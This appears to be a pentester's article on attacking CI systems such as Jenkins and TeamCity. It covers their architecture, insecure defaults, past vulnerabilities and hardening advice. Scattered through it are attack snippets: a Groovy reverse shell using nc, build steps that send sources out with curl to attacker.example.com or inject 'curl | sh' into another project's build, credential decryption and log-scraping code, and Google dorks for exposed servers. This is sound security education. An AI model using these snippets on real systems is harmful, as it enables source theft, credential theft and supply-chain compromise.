I am a pentester, and on almost every project that had anything to do with analyzing a developer's infrastructure I found Jenkins or TeamCity installed (once I even ran into Bamboo). A bit of googling told me that these are the so-called continuous integration systems. Naturally, at some point questions started popping up in my head: "What exactly are these systems?" and "What can I do with them?", from a pentester's point of view, of course. By answering these questions, we will figure out what a potential attacker can gain and what damage he can do within a developer's ecosystem using nothing but the continuous integration system available in it.
Agile is fashionable
I think most of Habr's readers are familiar with keywords like Agile, Scrum or even Sprint. If not, then briefly and very roughly it all boils down to this: a constant stream of new, finished (that is, having some finite set of features) application releases. You can read more on Wikipedia, for example. We will not dwell on this in detail, because a potential attacker does not really need that knowledge for a successful attack. It is worth noting, however, that every day more and more developers (yes, the majority!) convert to the Agile faith and, of course, face the need to somehow manage all these endless intermediate releases. And it is exactly for this purpose that continuous integration systems are used.
Looking ahead, it is worth explaining why these systems may interest an attacker (or, in our case, a pentester) and why you should worry about their security.
First, due to the specifics of their work, they interact directly with source code, the leakage of which can in many cases mean significant losses for the company.
Second, to correctly assemble source code into the final product, users of these systems create so-called build scripts, which can be implemented both with the means of the continuous integration system itself and with third-party tools (for example, scripts can be pulled from repositories). In the simplest case these scripts are batch or bash files, i.e. they are effectively limited only by the capabilities of the OS they run on. Thus, if an attacker manages to modify a build script, he can execute OS commands directly on the build server (a minimal sketch of such a step is given below).
In addition, as mentioned above, continuous integration systems are a convenient development management tool, so today they can be found on the internal network of almost every company that is in any way connected with software development. Moreover, for convenience such systems are often exposed directly to the Internet.
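To make the second point concrete, here is a minimal sketch of such an injected build step, written in Groovy (the same idiom as the Jenkins payload shown later in this article); the commands are deliberately harmless placeholders:
// A hypothetical extra step smuggled into a build script: it simply runs
// arbitrary OS commands with the privileges of the CI service account.
def proc = ["/bin/bash", "-c", "id; uname -a"].execute()
proc.waitFor()
println proc.text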
Continuous integration systems
Continuous integration (CI) as a term was first proposed by Grady Booch in his 1991 method, although he did not advocate integrating several times a day; extreme programming later adopted the practice and does advocate integrating more than once a day.
In this article we will rely on a typical software developer ecosystem, which is described below. If you already know (and you probably do) what it looks like, feel free to skip this section and go straight to the attacks. For everyone else, let's look at it in more detail.
In the figure we see the following entities:
IDE. The developer's environment: here the code is written and at some point committed to the source code repository.
Repository. Stores the source code and various metadata about it. This is where the continuous integration system pulls the code from during a build.
Continuous integration system. Automates building the source code and publishing either the resulting application or information about the problems found. Our main target.
Stand (shown in the picture as a server). In this case, the server onto which the application is deployed after a successful build.
Error tracker. The system for monitoring and tracking errors in the operation or assembly of the application. This is where the continuous integration system can file a report if a build cannot be completed successfully.
Now that we know who is who, let's describe the approximate sequence of actions performed when an application is built.
Consider the picture using a typical sprint as an example: the developer writes code and pushes (1) it to the repository. Then, on some event, the continuous integration system comes into play. It pulls the necessary source code from the repository (2-3) and starts the build process (4). On success, the built application can be deployed (5-1) to the stand. On failure, the system can create (5-2) a task in the bug tracker.
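For readers who prefer code to pictures, the same flow can be sketched as a Jenkins Pipeline. This is a hypothetical Jenkinsfile: the repository URL, build command, stand address and bug-tracker API are all made-up placeholders, and the numbers in the comments refer to the steps above:
pipeline {
    agent any
    stages {
        stage('Checkout') {
            steps { git 'https://repo.example.com/app.git' }   // (2-3) pull the sources
        }
        stage('Build') {
            steps { sh 'make build' }                          // (4) assemble
        }
        stage('Deploy') {
            steps { sh 'scp build/app.tar.gz ci@stand.example.com:/opt/app/' }   // (5-1) publish to the stand
        }
    }
    post {
        failure {
            // (5-2) file a report in the bug tracker; this API endpoint is invented for illustration
            sh 'curl -s -X POST https://tracker.example.com/api/issues -d "summary=Build failed"'
        }
    }
}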
A little about the principles of the system
Below is some brief information that will help outline the attack surface of the systems in question.
Role model
If we describe a common role model applicable to all popular continuous integration systems, it looks like this:
Anonymous. An ordinary user who has neither knowledge nor rights within the system under consideration. In fact, a typical casual visitor nobody was expecting.
User with read access to projects. At first glance looks just as powerless (from an attacker's point of view) as the previous one. However, in some cases even such rights may be enough to successfully escalate an attack onto the entire development infrastructure (see the first picture).
User with access to edit projects. An attacker with such rights will compromise the continuous integration system with almost 100% certainty.
Administrator. The user with the highest level of rights in the system. If an attacker gets such rights, it is game over.
Briefly about the components
As seen in the picture, a typical system consists of several components. Let's look at each of them in more detail:
Master. Controls the operation of the entire system: for example, the master is responsible for configuring all of its components and for managing builds. In addition, the master has all the capabilities of a slave. Given this role, the master can interact with all components of the system as well as with external elements such as repositories or stands.
Slave. The slave's main task is building applications and temporarily storing them. Slaves (and there may be many of them) are used to parallelize project builds and for some other purposes, such as access control (see the conclusion).
User interface (usually graphical plus some API). The name speaks for itself: it lets the user control the system. As a rule, it interacts directly with the master, which in turn hands tasks off to the slaves.
Plugins. Plugins deserve a category of their own, because in many systems (the same Jenkins, Bamboo or TeamCity) they play a very significant role: new authentication methods, various analyzers, reporting tools and so on. Moreover, a large number of plugins come pre-installed out of the box. Plugins can thus significantly expand an attacker's capabilities, effectively extending the existing attack surface. In addition, since plugins are often developed by third parties, fixing them may take much longer than fixing the core system.
All your code belongs to them
Now that we have an understanding of the very essence of continuous integration systems, it is time to find out what exactly their compromise threatens. To do this, let's walk through a few typical (and not so typical) attack scenarios, from banal phishing to infecting the applications being built.
Typical attack vectors against continuous integration systems
Phishing
The most obvious attack scenario: some vulnerability (in the case of Jenkins this may even be a standard feature, UserContent) + a credentials entry page = credentials of inattentive users of the system and, as a result, escalation of the attack across the infrastructure up to gaining control over the domain (if the system uses domain credentials for authorization).
Taking control of the server
Due to the specifics of these systems, obtaining remote code execution on them is largely a matter of persistence. Below we consider several ways (a minimal Script Console sketch of where this usually ends up is given at the end of this section):
Executing OS commands on the build server (agent or master) through a banal vulnerability in the user interface (and, as we remember, these systems have plenty of web vulnerabilities).
Another way, specific to Jenkins, is described here. However, "as is" it only works on the default configuration, when role-based access and CSRF tokens are disabled, so for exploitation the attacker will most likely also need some kind of web bug.
A more versatile, but much harder to implement way is an attack through plugins.
It is difficult because the attacker will have to mount some form of MitM attack on the channel through which plugins are delivered. This is worth dwelling on in more detail. There are two main ways a plugin gets into a continuous integration system:
The plugin is uploaded by the system administrator. In this case the attacker may, for example, somehow wedge himself into the channel between the parties involved in the download and replace the transmitted data.
The plugin is downloaded from a public plugin repository. Here I will allow myself to dream a little.
An attacker can try to get his own plugin into the public repository and wait. This scheme, although it does not look very realistic, may well be feasible.
Another option is to intercept the traffic; in essence it is similar to the first method.
One more way to deliver plugins is to set up your own plugin update server.
To implement such a scenario the attacker will need his own plugin server; the Juseppe server is perfect for these purposes. Besides the server, of course, the attacker also needs a plugin. A payload fragment for such a plugin can be found on GitHub. That plugin used a simple Groovy script to get a reverse shell:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash", "-c", "mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc host port 1>/tmp/backpipe"] as String[])
p.waitFor()
And here is a video demonstrating such a scheme in action:
By the way, a funny note about administration and security: at the time this scheme was being tested, the JENKINS-31089 bug was open; its essence was that it was impossible to set up a plugin update server because of problems with plugin signature verification. Among the suggested workarounds we saw, for example, the following:
Set hudson.model.DownloadService.noSignatureCheck to true.
That is, they essentially suggest disabling signature verification of remotely downloaded plugins, which, of course, does not add any security.
As a result of exploiting this vector, the attacker gains control over the build server and all the data stored on its file system (including application source code). Moreover, having gained control over the server, the attacker can escalate the attack further into the infrastructure.
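As promised above, here is the minimal Script Console sketch. Once an attacker reaches the Jenkins web interface with admin-level access (through any of the routes described in this section), "control of the build server" usually boils down to a couple of lines of Groovy pasted into the built-in Script Console at /script; the commands below are deliberately harmless:
// Shows where on the file system the master keeps its data (and therefore
// where secrets/ and project workspaces live), then runs an OS command
// with the privileges of the CI service account.
println jenkins.model.Jenkins.instance.rootDir
println "id".execute().text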
Source Theft
This vector exploits an interesting feature of many continuous integration systems: the project build process is not restricted on the file system of the build server (master or slave), so a build script can read and write files outside the current build directory. Thus, if an attacker is able to modify build scripts (for example, by gaining access to the repository), he can easily steal the source code of any other project, since before a build all source code is checked out into the temporary directories of the respective projects.
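A minimal sketch of such a "greedy" build step, again in the Groovy idiom used above (the neighbouring workspace path, archive name and exfiltration host are assumptions made up for the example):
// Packs a neighbouring project's checked-out sources and ships the archive out.
def cmd = "tar czf /tmp/other.tgz ../another-project && curl -s -T /tmp/other.tgz http://attacker.example.com/upload"
def p = ["/bin/bash", "-c", cmd].execute()
p.waitFor()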
Privilege escalation
Here, privilege escalation happens not only (and not so much) within the continuous integration system itself as within the developer's ecosystem as a whole. An example: an attacker pulls ssh keys for the source code repository out of the logs, thereby raising his privileges in the context of the repository. The escalation itself can be carried out in completely different ways, some of which have already been described above.
(Un)typical attack vectors against continuous integration systems
This part collects several attack vectors that abuse the core business processes of continuous integration systems.
Infecting an application with malicious code
A striking example of this kind of attack is the infection of the Transmission torrent client for OS X. If millions of people use your product, the consequences are easy to predict. Two attack variants immediately come to mind. Suppose the attacker has no access to the repository with the code he wants to infect, but does have editing rights (whether through a vulnerability or in some other way) in the continuous integration system. In that case it is enough for him to modify the build configuration of the attacked project, adding the necessary actions to the list of pre-build steps that are executed before the actual build starts.
If the attacker has access neither to the repository nor to the project, he can try to act through a project he does have access to, modifying the source code of the attacked project directly on the file system of the build server. For this to work, the server must not clean the build directory after a build. It is worth explaining here that when the next build is initialized, the continuous integration system may skip downloading the source code from the repository, for example if it sees no changes since the last checkout.
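A sketch of this second variant, run as a pre-build step in the project the attacker does control (the relative path, the injected command and the victim's build.sh are all invented for the example):
// Assumes the victim project's workspace from a previous build is still on
// disk and that the next build will reuse it without a fresh checkout.
def inject = 'echo "curl -s http://attacker.example.com/x | sh" >> ../victim-project/build.sh'
def p = ["/bin/bash", "-c", inject].execute()
p.waitFor()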
Theft of private application signature keys
Stolen keys can be used for different purposes, for example, to sign the attacker's own malicious software.
The video presents one of the ways to implement such an attack.
Botnet?
Why not build a botnet out of the systems sticking out into the Internet? There are plenty of vulnerable servers out there.
You can search for them yourself using Google dorks:
intitle:"Dashboard [Jenkins]" - all internet Jenkins intitle:"Dashboard [Jenkins]" intext:"Manage Jenkins" - all Jenkins without authentication intitle:"Projects - TeamCity" - all TeamCity with guest access intitle:"Register a New User Account - TeamCity" - all TeamCity with open registration
Having considered the scenarios above, it becomes clear that a continuous integration system should be well protected. If you think your system is protected out of the box, that is far from the case. To demonstrate this, the default settings of several continuous integration systems are examined below.
Jenkins
First, out of the box CSRF tokens are, for some reason, turned off.
Second (and this is even better!), by default Jenkins does not require any authentication at all: come in and do whatever you like. By the way, the matrix role model is implemented as an additional plugin, which is included in the basic package.
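To be fair, flipping these defaults is not hard. A minimal hardening sketch, for example as an init script dropped into $JENKINS_HOME/init.groovy.d/ (the choice of authorization strategy is a matter of taste; this one simply requires login, disables self-registration and turns CSRF crumbs on):
import jenkins.model.Jenkins
import hudson.security.HudsonPrivateSecurityRealm
import hudson.security.FullControlOnceLoggedInAuthorizationStrategy
import hudson.security.csrf.DefaultCrumbIssuer

def j = Jenkins.getInstance()
j.setSecurityRealm(new HudsonPrivateSecurityRealm(false))                       // local accounts, self-signup disabled
j.setAuthorizationStrategy(new FullControlOnceLoggedInAuthorizationStrategy())  // any action requires login
j.setCrumbIssuer(new DefaultCrumbIssuer(true))                                  // enable CSRF protection
j.save()
A finer-grained setup would use the matrix authorization plugin mentioned above instead of the full-control strategy.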
TeamCity
By default, anyone can register in the system, and depending on the configuration the new user can end up with the Project Manager role (which corresponds to the third level of our role model). Even if, after registering, the user is only assigned the Project Viewer role, this still gives the attacker some advantages, and in a couple of sentences I will explain which ones.
In addition, TeamCity by default allows guest access, which gives an attacker the right to look through projects and view build logs (essentially the same as Project Viewer).
That may not seem so serious; however, due to the way build scripts are run, all sorts of interesting information can end up in the logs (for example, ssh or ftp passwords), and this data sits there in the clear! Thus, guest access + some build logs = all the passwords in our pocket. Just like dumpster diving!
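A rough sketch of how little effort this takes when guest access is enabled (the server address, build id and even the log URL layout are assumptions; adjust them to the target TeamCity version):
// Pulls a build log via guest access and prints lines that look like secrets.
def log = new URL("http://teamcity.example.com/guestAuth/downloadBuildLog.html?buildId=12345").text
log.eachLine { line ->
    if (line =~ /(?i)(password|passwd|secret|token)\s*[=:]/) {
        println line
    }
}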
In addition, in most boxed continuous integration solutions the master is also a slave by default. This means that potentially untrusted code (who said GitHub can be trusted?) will be executed in the same place where the configuration of the entire system is stored, along with the source code of other projects (possibly even private ones). In other words, by modifying a piece of a build script stored in a public repository, an attacker can get access to the build server configuration as well as the source code of the projects built on the same agent. Here is what configuration data an attacker can reach by running his code on a Jenkins or TeamCity master:
Jenkins
$JENKINS_HOME/:
./secrets/* - various key material: the master key used to encrypt stored passwords, the seed for generating tokens, and so on.
./workspace/* - contains the data (including source code) of all projects built on the current agent.
./userContent/* - essentially the root directory of the web server embedded in Jenkins.
./config.xml - the main Jenkins configuration file.
./credentials.xml - credentials stored by Jenkins (including encrypted passwords).
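This is why access to the master's file system is effectively game over: Jenkins will happily decrypt its own secrets. A minimal sketch for the Script Console on a compromised master (the encrypted blob is just a placeholder for a value copied out of credentials.xml):
// Asks Jenkins to decrypt a stored secret using the keys kept under $JENKINS_HOME/secrets/.
def encrypted = "{AQAAABAAAAAQ...paste-a-value-from-credentials.xml...}"
println(hudson.util.Secret.fromString(encrypted).getPlainText())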
TeamCity
.BuildServer/config/* - server configuration.
buildAgent/work/* - the working directory with the data of all projects built on the agent.
$TEAMCITY_HOME/:
webapps/ - the root directory of the TeamCity web distribution.
logs/teamcity-server.log | grep super - in the TeamCity logs you can find the super user password; it is generated randomly at each server start, and the super user has maximum rights.
Summing up the above, we can safely say that the default settings are not secure at all. However, even if the system is configured properly, there are still plenty of ways to abuse it for one's own "dirty" purposes.
What about vulnerabilities?
Continuous integration systems, like any other large systems, naturally have vulnerabilities. The most popular entry point for finding them is the various user interfaces: in every system I have come across, the graphical interface is a web application, with all the usual web vulnerabilities that implies (hello, OWASP).
Let's start with an interesting vulnerability in older versions of TeamCity. The vulnerability allowed access to the registration page even if registration of new users was disabled in the configuration. As a result, an attacker could register and obtain a certain set of rights in the system (see the previous section) despite the administrator's explicit prohibition. More details are in this article.
Now another example, this time from Jenkins. The vulnerability allowed bypassing the CSRF token check in almost any function of the Jenkins web application in all versions up to 1.641 (LTS 1.625.3). The whole problem was in the class /core/src/main/java/hudson/security/csrf/CrumbFilter.java and an incorrect condition for checking the validity of a request:
if (valid || isMultipart(httpRequest)) {
    chain.doFilter(request, response);
} else {
    LOGGER.log(Level.WARNING, "No valid crumb was included in request for {0}. Returning {1}.",
        new Object[] {httpRequest.getRequestURI(), HttpServletResponse.SC_FORBIDDEN});
That is, the check is considered successful if either the valid flag is set or the request contains data of type multipart/form-data (Content-Type: multipart/form-data; boundary=---------------------------blahblah).
Using this vulnerability plus, for example, the standard ability to execute shell scripts when building a project, an attacker can modify any project the victim has edit access to, adding the execution of a shell script as a build step. As a result we get remote code execution on the build machine. For clarity, consider an example: the attacker sends the Jenkins administrator a link to a page hosting JavaScript code that issues a POST request with Content-Type: multipart/form-data to the URL /view/All/job/test1/configure. This request bypasses the CSRF protection implemented in Jenkins and modifies the project as needed. Triggering the project build is done in the same way.
Another (very!) interesting Jenkins vulnerability is related to deserialization of Java objects by the Jenkins CLI utility. Jenkins CLI is a command-line interface for interacting with a Jenkins server; in short, it talks to Jenkins over its own protocol, in which all data is transmitted in serialized form. You can learn more about the utility at jenkins-ci.org. The discovered vulnerability allows an unauthenticated user to execute arbitrary code in the Jenkins context; exploitation goes through the well-known gadget chain in the Apache Commons Collections library. A detailed description of the vulnerability can be found at foxglovesecurity. A similar vulnerability exists in Bamboo. And since we are talking about deserialization: another bug was recently found, this time in the XStream library, which Jenkins uses to parse XML (for example, in the /createItem handler). A good description of the bug is given here.
Conclusions
Based on the above, when deploying continuous integration systems you should put additional effort into protecting them properly. And, of course, do not forget about additional tools and technologies that can raise the level of protection of such systems within your infrastructure.
And finally, some recommendations:
Never use the default settings under any circumstances.
Try not to run the system on all network interfaces. When starting, always bind it to a specific interface (not 0.0.0.0): such systems should not "look out" onto the Internet.
Do not mindlessly install additional plugins and other tools: they often contain new vulnerabilities of their own.
Update in a timely manner. If you look around, you will see that continuous integration systems are updated constantly (including fixes for critical vulnerabilities), so the right thing to do is to keep an eye on new security advisories. Useful links: Jenkins, Bamboo.
If possible, try to isolate projects from each other as much as possible, for example by using a separate slave for each project. If there is not enough hardware, you can try making disposable slaves using containers or existing plugins.